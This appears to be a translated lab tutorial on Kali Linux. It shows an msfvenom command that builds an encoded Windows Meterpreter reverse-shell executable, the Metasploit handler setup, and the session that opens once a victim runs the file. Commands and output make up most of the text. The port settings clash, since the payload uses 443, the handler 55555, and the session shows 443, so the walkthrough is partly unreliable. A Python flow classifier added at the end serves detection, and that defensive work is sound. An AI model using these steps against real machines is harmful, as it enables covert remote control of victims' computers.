Kali Defense, Chapter 9: Metasploit as My Own Remote-Control Software

Source: Internet
Author: User

Preparation Tools

1. Kali system, IP 10.10.10.131

2. Victim system, IP 10.10.10.133

Steps:

1. Generate the Trojan control program

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.10.10.131 LPORT=443 -f exe > Abc.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai chosen with final size 468
Payload size: 468 bytes

Note: LHOST and LPORT are the local (Kali) machine's own IP address and port, not the victim's IP.

2. Start Metasploit from the command line

root@kali:~# msfconsole


=[Metasploit v4.11.5-2015103001]

+----=[exploits-864 auxiliary-251 post]

+----=[432 payloads-37 encoders-8 Nops]

+----=[free Metasploit Pro Trial:http://r-7.co/trymsp]

3. Use the handler module

msf > use exploit/multi/handler

4. View the handler parameters

msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

5. Set the payload (shellcode)

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > SHOW
[-] Unknown command: show.
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.10.131     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

6. Set LHOST and LPORT

msf exploit(handler) > set LHOST 10.10.10.131
LHOST => 10.10.10.131
msf exploit(handler) > set LPORT 55555
LPORT => 55555
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.10.131     yes       The listen address
   LPORT     55555            yes       The listen port

7. Run the exploit command

msf exploit(handler) > exploit

8. The victim executes the Abc.exe file

9. Verification

[*] Started reverse handler on 10.10.10.131:443
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 10.10.10.133
[*] Meterpreter session 1 opened (10.10.10.131:443 -> 10.10.10.133:1049) at 2015-12-07 23:41:20 +0800
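
Seen from the network, the session in step 9 is a connection to port 443 on which the server, not the client, sends the first bytes, and those bytes are not a TLS record. The added example below (not part of the original article) classifies flow summaries on that basis for detection purposes. The Flow fields, the MIN_STAGE threshold and the sample records are constructed for illustration, and the check assumes the stage is delivered as a 4-byte little-endian length followed by the stage itself.

```python
import struct
from dataclasses import dataclass

MIN_STAGE = 64 * 1024  # assumed lower bound for a staged payload; tune per site

@dataclass
class Flow:                      # hypothetical flow summary from a sensor
    client: str
    server: str
    dport: int
    first_speaker: str           # "client" or "server"
    first_payload: bytes         # first application bytes seen on the flow
    server_bytes: int            # bytes the server sent before the client spoke

def is_tls_record(data: bytes) -> bool:
    # A TLS handshake record starts with type 0x16 and major version 0x03.
    return len(data) >= 3 and data[0] == 0x16 and data[1] == 0x03

def classify(flow: Flow) -> str:
    if flow.dport != 443:
        return "ignore"
    if flow.first_speaker == "client" and is_tls_record(flow.first_payload):
        return "tls"
    if flow.first_speaker == "server" and len(flow.first_payload) >= 4:
        (declared,) = struct.unpack("<I", flow.first_payload[:4])
        # Assumption: stage arrives as <4-byte LE length><stage bytes>.
        if declared >= MIN_STAGE and flow.server_bytes >= declared + 4:
            return "length-prefixed-stage"
    return "non-tls-on-443"

# Constructed sample flows; the first mirrors the addresses and the
# 885806-byte stage shown in step 9, the rest are benign or out of scope.
SAMPLE_FLOWS = [
    Flow("10.10.10.133", "10.10.10.131", 443, "server",
         struct.pack("<I", 885806) + b"\x00" * 12, 885806 + 4),
    Flow("10.10.10.133", "192.0.2.10", 443, "client",
         b"\x16\x03\x01\x02\x00\x01", 0),
    Flow("10.10.10.133", "192.0.2.20", 443, "client",
         b"GET / HTTP/1.1\r\n", 0),
    Flow("10.10.10.133", "192.0.2.30", 80, "client",
         b"GET / HTTP/1.1\r\n", 0),
]

def triage(flows):
    """Return (client, server, verdict) for port-443 flows that are not TLS."""
    return [(f.client, f.server, v) for f in flows
            if (v := classify(f)) not in ("ignore", "tls")]

if __name__ == "__main__":
    for row in triage(SAMPLE_FLOWS):
        print(*row)
```
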
